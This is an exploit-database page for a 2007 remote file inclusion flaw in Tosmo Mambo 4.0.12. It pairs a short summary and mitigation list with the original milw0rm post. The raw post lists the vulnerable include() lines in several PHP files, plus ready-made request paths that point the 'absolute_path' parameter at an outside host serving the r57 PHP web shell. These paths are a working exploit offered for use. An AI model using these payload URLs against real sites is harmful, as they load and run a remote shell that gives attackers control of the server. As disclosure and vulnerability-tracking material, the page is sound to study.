Tosmo Mambo - exploit.company

vendor:

Tosmo Mambo

by:

Cold z3ro

7.5

CVSS

HIGH

Remote File Inclusion (RFI)

CWE

Product Name: Tosmo Mambo

Affected Version From: <= 4.0.12

Affected Version To: <= 4.0.12

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Tosmo Mambo <= 4.0.12 (absolute_path) Multiple RFI Vulnerabilities

The vulnerability allows an attacker to include remote files by manipulating the 'absolute_path' parameter in various PHP files. This can lead to unauthorized access, remote code execution, and potential compromise of the affected system.

Mitigation:

1. Update to the latest version of Tosmo Mambo.2. Implement proper input validation and sanitization to prevent remote file inclusion attacks.3. Regularly monitor and audit the application's logs for any suspicious activity.

Source

Exploit-DB raw data:

=======================================================
Tosmo Mambo <= 4.0.12 (absolute_path) Multiple RFI Vulnerabilities
=======================================================
Found By : Cold z3ro , Cold-z3ro@hotmail.com
=======================================================
Homepage: www.Hack-Teach.com
=======================================================
Script Site :
http://www2.tutorial.hu/letoltes/dl.php?p=/scriptek/joomla/mambo.4.0.x&i=tosmo_mambo.zip
==============================================
File : /components/com_minibb.php
include("$absolute_path/components/minibb/bb_admin.php");
======
/components/com_minibb.php?absolute_path=http://nachrichtenmann.de/r57.txt?

========================================================

File : /components/minibb/bb_plugins.php

<?php
include ($absolute_path.'/components/minibb/hack_smilies.php');
?>
======
/components/minibb/bb_plugins.php?absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_minibb/bb_plugins.php?absolute_path=http://nachrichtenmann.de/r57.txt?
=======================================================

File : configuration.php?absolute_path=http://nachrichtenmann.de/r57.txt?
include_once("$absolute_path/version.php");
======
/configuration.php?absolute_path=http://nachrichtenmann.de/r57.txt?
=======================================================
#Long Life Palestine
#www.Hack-Teach.com

# milw0rm.com [2007-04-11]